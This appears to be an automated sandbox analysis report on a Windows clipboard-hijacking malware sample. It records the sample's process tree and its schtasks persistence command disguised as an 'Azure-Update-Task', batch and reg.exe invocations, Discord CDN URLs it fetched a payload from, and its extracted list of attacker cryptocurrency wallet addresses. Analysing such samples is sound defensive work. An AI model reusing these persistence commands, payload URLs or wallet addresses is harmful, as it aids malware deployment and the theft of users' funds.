Play interactive tour

Edit tour

Windows Analysis Report hTu8FeYy28.exe

Overview

General Information

Sample Name:	hTu8FeYy28.exe
Analysis ID:	499635
MD5:	a003b564bd23880f99a29006e780a89b
SHA1:	8465374554a0c6c02f7914c1278afd79e96ed8c4
SHA256:	5bc09c3c2a751169a32cf97a62765f127bce2d0eadce3481a6a831b6fdcc044e
Tags:	exeModiLoader
Infos:
Most interesting Screenshot:

Detection

Clipboard Hijacker

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Yara detected Clipboard Hijacker

Contains functionality to compare user and computer (likely to detect sandboxes)

Uses schtasks.exe or at.exe to add and modify task schedules

Injects a PE file into a foreign processes

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Antivirus or Machine Learning detection for unpacked file

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Drops PE files

Uses reg.exe to modify the Windows registry

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Dropped file seen in connection with other malware

Contains functionality to dynamically determine API calls

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

hTu8FeYy28.exe (PID: 3092 cmdline: 'C:\Users\user\Desktop\hTu8FeYy28.exe' MD5: A003B564BD23880F99A29006E780A89B)

hTu8FeYy28.exe (PID: 2336 cmdline: C:\Users\user\Desktop\hTu8FeYy28.exe MD5: A003B564BD23880F99A29006E780A89B)

schtasks.exe (PID: 4600 cmdline: /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4528 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 2824 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6920 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

reg.exe (PID: 1716 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)

conhost.exe (PID: 4776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

fodhelper.exe (PID: 3548 cmdline: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe MD5: A003B564BD23880F99A29006E780A89B)

cleanup

Malware Configuration

Threatname: Clipboard Hijacker

{"Crypto Addresses": ["Ae2tdPwUPEZDqNhACJ3ZT5NdXjkNffGAwa4Mc9N87udKWYzt1VnFngLMnPE", "addr1q9clx0ud02ehvzuqqtqu4tchl6g9kkzllcl2zjpan9kp39m37vlc674nwc9cqqkpe2h30l5stdv9ll3759yrmxtvrztspanadd", "bc1q7hrr7lvjrgdcskmnydwry3629c73qfx9gpk2mc", "cosmos1l8p5237wclrtqf8upw8quwuj32f30zv8gej0jc", "ltc1q0jyf5za7n5pxuz8tgvhzjkaaf5cz5kykp5cd55", "D7Dhy317Lph7ZAx4GALQtYdzcFrx35GSNK", "AYFTxSxSzjDWb2D3fs4TjjsswB41M6Tw6T", "7UT25554RQSTW2S44UVFYWZIZDWQIKUT3O7LG4QBOYDJ7IIEBVFYZZW4YI", "MFxCfYKXwLG1eM93xuNoNCzLoy7an3Ekud", "00000L0000T00MON00000000000000000000000LZRNV3CB6Ei9bZtXDQ2k6Sy7emnNX4rzTQ00000000000000W0000000", "D2eMjtv3Fh2EnsZ8SH4FCyvwxNawtpHDxXzBgS4sME4M", "0x4b222739496bcf2AA1F609585dACd8858943B39c", "84VKKNB6tQLam7LPn9PTdKYUfZepoYTfmMMYFEa7btqs7XMqyPWpMdq9FGSvZKsVNgDddtC5JTr1p3ACp9Cbod2f8KABjkw", "CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG", "t3SCmhgjNi8B5amJUw61Tc86B9CsTTJvPy7", "TM5d5ZK4uEDe3Ry8gy35nTQLcswbHDzS95", "18SJmQtHkoRMaaJSCPHn85u5dgTXTiDBZN", "Z18SJmQtHkoRMaaJSCPHn85u5dgTXTiDBZN", "3JxVQHXyiwwws3Yykkw2sUbRNkgimDi725", "bnb1xw6czzmz0arvpf88ufwj4k0yfwfd8vps9f43xu", "LZRNV3CB6Ei9bZtXDQ2k6Sy7emnNX4rzTQ"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
00000011.00000001.524041171.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security

Unpacked PEs

Source	Rule	Description	Author
17.2.hTu8FeYy28.exe.400000.0.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
17.2.hTu8FeYy28.exe.400000.0.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
17.1.hTu8FeYy28.exe.400000.0.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
17.1.hTu8FeYy28.exe.400000.0.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 17.1.hTu8FeYy28.exe.400000.0.unpack

Malware Configuration Extractor: Clipboard Hijacker {"Crypto Addresses": ["Ae2tdPwUPEZDqNhACJ3ZT5NdXjkNffGAwa4Mc9N87udKWYzt1VnFngLMnPE", "addr1q9clx0ud02ehvzuqqtqu4tchl6g9kkzllcl2zjpan9kp39m37vlc674nwc9cqqkpe2h30l5stdv9ll3759yrmxtvrztspanadd", "bc1q7hrr7lvjrgdcskmnydwry3629c73qfx9gpk2mc", "cosmos1l8p5237wclrtqf8upw8quwuj32f30zv8gej0jc", "ltc1q0jyf5za7n5pxuz8tgvhzjkaaf5cz5kykp5cd55", "D7Dhy317Lph7ZAx4GALQtYdzcFrx35GSNK", "AYFTxSxSzjDWb2D3fs4TjjsswB41M6Tw6T", "7UT25554RQSTW2S44UVFYWZIZDWQIKUT3O7LG4QBOYDJ7IIEBVFYZZW4YI", "MFxCfYKXwLG1eM93xuNoNCzLoy7an3Ekud", "00000L0000T00MON00000000000000000000000LZRNV3CB6Ei9bZtXDQ2k6Sy7emnNX4rzTQ00000000000000W0000000", "D2eMjtv3Fh2EnsZ8SH4FCyvwxNawtpHDxXzBgS4sME4M", "0x4b222739496bcf2AA1F609585dACd8858943B39c", "84VKKNB6tQLam7LPn9PTdKYUfZepoYTfmMMYFEa7btqs7XMqyPWpMdq9FGSvZKsVNgDddtC5JTr1p3ACp9Cbod2f8KABjkw", "CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG", "t3SCmhgjNi8B5amJUw61Tc86B9CsTTJvPy7", "TM5d5ZK4uEDe3Ry8gy35nTQLcswbHDzS95", "18SJmQtHkoRMaaJSCPHn85u5dgTXTiDBZN", "Z18SJmQtHkoRMaaJSCPHn85u5dgTXTiDBZN", "3JxVQHXyiwwws3Yykkw2sUbRNkgimDi725", "bnb1xw6czzmz0arvpf88ufwj4k0yfwfd8vps9f43xu", "LZRNV3CB6Ei9bZtXDQ2k6Sy7emnNX4rzTQ"]}

Multi AV Scanner detection for submitted file

Show sources

Source: hTu8FeYy28.exe

Virustotal: Detection: 12%

Perma Link

Source: 17.1.hTu8FeYy28.exe.400000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 17.2.hTu8FeYy28.exe.400000.0.unpack	Avira: Label: TR/ATRAPS.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\hTu8FeYy28.exe

Unpacked PE file: 17.2.hTu8FeYy28.exe.400000.0.unpack

Source: hTu8FeYy28.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: unknown

HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49821 version: TLS 1.2

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: global traffic	HTTP traffic detected: GET /attachments/895973838674862135/895974928933875752/Lnouxqkbbgkvxwmwtigvjxpvnenadlc HTTP/1.1User-Agent: lValiHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /attachments/895973838674862135/895974928933875752/Lnouxqkbbgkvxwmwtigvjxpvnenadlc HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache

Source: unknown

HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49821 version: TLS 1.2

Source: C:\Users\user\Desktop\hTu8FeYy28.exe

Code function: 17_2_00401FEF OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,

17_2_00401FEF

Source: C:\Users\user\Desktop\hTu8FeYy28.exe

Code function: 17_2_00401F8B GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree,

17_2_00401F8B

Source: hTu8FeYy28.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: hTu8FeYy28.exe	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: hTu8FeYy28.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fodhelper.exe.17.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: fodhelper.exe.17.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe 5BC09C3C2A751169A32CF97A62765F127BCE2D0EADCE3481A6A831B6FDCC044E

Source: hTu8FeYy28.exe

Virustotal: Detection: 12%

Source: C:\Users\user\Desktop\hTu8FeYy28.exe

File read: C:\Users\user\Desktop\hTu8FeYy28.exe

Jump to behavior

Source: C:\Users\user\Desktop\hTu8FeYy28.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\hTu8FeYy28.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\hTu8FeYy28.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\hTu8FeYy28.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\hTu8FeYy28.exe 'C:\Users\user\Desktop\hTu8FeYy28.exe'
Source: C:\Users\user\Desktop\hTu8FeYy28.exe	Process created: C:\Users\user\Desktop\hTu8FeYy28.exe C:\Users\user\Desktop\hTu8FeYy28.exe
Source: C:\Users\user\Desktop\hTu8FeYy28.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Source: C:\Users\user\Desktop\hTu8FeYy28.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hTu8FeYy28.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Windows\SysWOW64\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hTu8FeYy28.exe	Process created: C:\Users\user\Desktop\hTu8FeYy28.exe C:\Users\user\Desktop\hTu8FeYy28.exe	Jump to behavior
Source: C:\Users\user\Desktop\hTu8FeYy28.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '	Jump to behavior
Source: C:\Users\user\Desktop\hTu8FeYy28.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '	Jump to behavior
Source: C:\Users\user\Desktop\hTu8FeYy28.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f	Jump to behavior

Source: C:\Users\user\Desktop\hTu8FeYy28.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\hTu8FeYy28.exe	Mutant created: \Sessions\1\BaseNamedObjects\CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4776:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_01

Source: C:\Users\user\Desktop\hTu8FeYy28.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Lnouxqkbbgkvxwmwtigvjxpvnenadlc[1]

Jump to behavior

Source: C:\Users\user\Desktop\hTu8FeYy28.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '

Source: classification engine

Classification label: mal92.spyw.evad.winEXE@21/8@1/1

Source: C:\Users\user\Desktop\hTu8FeYy28.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\hTu8FeYy28.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: hTu8FeYy28.exe

Static file information: File size 1195008 > 1048576

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\hTu8FeYy28.exe

Unpacked PE file: 17.2.hTu8FeYy28.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\hTu8FeYy28.exe

Unpacked PE file: 17.2.hTu8FeYy28.exe.400000.0.unpack

Source: C:\Users\user\Desktop\hTu8FeYy28.exe

Code function: 17_2_00401000 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

17_2_00401000

Source: C:\Users\user\Desktop\hTu8FeYy28.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\Desktop\hTu8FeYy28.exe

Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe'

Source: C:\Users\user\Desktop\hTu8FeYy28.exe

17_2_00401000

Source: C:\Users\user\Desktop\hTu8FeYy28.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to compare user and computer (likely to detect sandboxes)

Show sources

Source: C:\Users\user\Desktop\hTu8FeYy28.exe

Code function: GetModuleFileNameW,SHGetFolderPathW,PathAppendW,PathIsDirectoryW,CreateDirectoryW,PathAppendW,StrStrW,CopyFileW,ExitProcess,

17_2_00401272

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\hTu8FeYy28.exe

17_2_00401000

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\hTu8FeYy28.exe

Memory written: C:\Users\user\Desktop\hTu8FeYy28.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\hTu8FeYy28.exe	Process created: C:\Users\user\Desktop\hTu8FeYy28.exe C:\Users\user\Desktop\hTu8FeYy28.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f	Jump to behavior

Source: fodhelper.exe, 0000001A.00000002.561710957.0000000000E80000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: fodhelper.exe, 0000001A.00000002.561710957.0000000000E80000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: fodhelper.exe, 0000001A.00000002.561710957.0000000000E80000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: fodhelper.exe, 0000001A.00000002.561710957.0000000000E80000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Stealing of Sensitive Information:

Yara detected Clipboard Hijacker

Show sources

Source: Yara match	File source: 17.2.hTu8FeYy28.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.hTu8FeYy28.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.hTu8FeYy28.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.hTu8FeYy28.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000001.524041171.0000000000400000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection112	Masquerading1	OS Credential Dumping	Security Software Discovery1	Remote Services	Clipboard Data2	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting1	Application Shimming1	Scheduled Task/Job1	Modify Registry1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Logon Script (Windows)	Application Shimming1	Process Injection112	Security Account Manager	Remote System Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting1	NTDS	System Information Discovery11	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing21	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
hTu8FeYy28.exe	12%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
26.2.fodhelper.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1131223	Download File
17.1.hTu8FeYy28.exe.400000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
17.2.hTu8FeYy28.exe.400000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.discordapp.com	162.159.130.233	true	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.159.130.233	cdn.discordapp.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	499635
Start date:	08.10.2021
Start time:	17:49:04
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	hTu8FeYy28.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.spyw.evad.winEXE@21/8@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 66.7%) Quality average: 59.5% Quality standard deviation: 44.6%
HCA Information:	Successful, ratio: 91% Number of executed functions: 8 Number of non-executed functions: 6
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.49.157.6, 52.251.79.25, 40.112.88.60, 20.54.110.249, 2.20.178.10, 2.20.178.56, 93.184.221.240, 20.199.120.182, 20.199.120.85, 2.20.178.33, 2.20.178.24, 20.82.209.183 Excluded domains from analysis (whitelisted): consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wu-shim.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:51:49	API Interceptor	2x Sleep call for process: hTu8FeYy28.exe modified
17:51:53	Task Scheduler	Run new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
162.159.130.233	b7cwlpwH6S.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/878382243242983437/878684457245220884/mrmoms.exe
	order-confirmation.doc__.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
	Order Confirmation.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
	cfe14e87_by_Libranalysis.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/520353354304585730/839557970173100102/ew.exe
